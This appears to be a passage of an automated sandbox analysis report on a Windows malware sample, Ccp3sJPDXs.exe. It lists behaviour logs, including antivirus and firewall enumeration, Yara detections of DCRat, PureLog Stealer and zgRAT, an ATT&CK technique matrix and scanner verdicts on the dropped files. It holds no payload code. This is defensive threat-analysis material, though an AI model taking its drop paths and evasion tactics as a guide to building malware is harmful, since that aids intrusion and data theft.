Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Queries volume information: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe VolumeInformation
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_007EDF1E

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007DB146 GetVersionExW,

0_2_007DB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Blockbrowser.exe PID: 4368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8Kh5jgTdnc69SVsXvfN.exe PID: 7940, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Ccp3sJPDXs.exe, type: SAMPLE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2195365326.00000000067A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Ccp3sJPDXs.exe, type: SAMPLE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Blockbrowser.exe PID: 4368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8Kh5jgTdnc69SVsXvfN.exe PID: 7940, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Ccp3sJPDXs.exe, type: SAMPLE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2195365326.00000000067A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Ccp3sJPDXs.exe, type: SAMPLE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
Source: Yara match	File source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	12 Process Injection	122 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	351 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	157 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ccp3sJPDXs.exe	76%	Virustotal		Browse
Ccp3sJPDXs.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Dropped Files

Source	Detection	Scanner	Label
C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\SnwWbCTA.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\Public\Documents\0ZuAkTjxKX.exe	100%	Avira	HEUR/AGEN.1339906
C:\SavesHost\6kXFj.vbe	100%	Avira	VBS/Runner.VPA
C:\SavesHost\SgrmBroker.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\JRXzWseY.log	100%	Avira	TR/Agent.egqpz
C:\Users\user\Desktop\Opngnglp.log	100%	Avira	TR/Agent.jbwuj
C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat	100%	Avira	BAT/Delbat.C
C:\SavesHost\Blockbrowser.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\NzeXyGEM.log	100%	Avira	HEUR/AGEN.1362695
C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\SavesHost\Blockbrowser.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\SavesHost\SgrmBroker.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Documents\0ZuAkTjxKX.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IxKHLBgB.log	9%	ReversingLabs
C:\Users\user\Desktop\JRXzWseY.log	25%	ReversingLabs
C:\Users\user\Desktop\JulPgBvw.log	17%	ReversingLabs
C:\Users\user\Desktop\KxrpdWzR.log	12%	ReversingLabs
C:\Users\user\Desktop\LipXSOru.log	12%	ReversingLabs
C:\Users\user\Desktop\NzeXyGEM.log	17%	ReversingLabs
C:\Users\user\Desktop\Opngnglp.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\OvRyOCaQ.log	21%	ReversingLabs
C:\Users\user\Desktop\OwFfUGTH.log	17%	ReversingLabs
C:\Users\user\Desktop\SnwWbCTA.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\TcFfQdBd.log	29%	ReversingLabs
C:\Users\user\Desktop\UQJnCrwb.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UgLFMzEy.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XnIOiRzu.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\YYGwXJrX.log	17%	ReversingLabs
C:\Users\user\Desktop\ZEamenMP.log	25%	ReversingLabs
C:\Users\user\Desktop\apvwEADp.log	29%	ReversingLabs
C:\Users\user\Desktop\bGNUAWQL.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\bVPmLfYi.log	8%	ReversingLabs
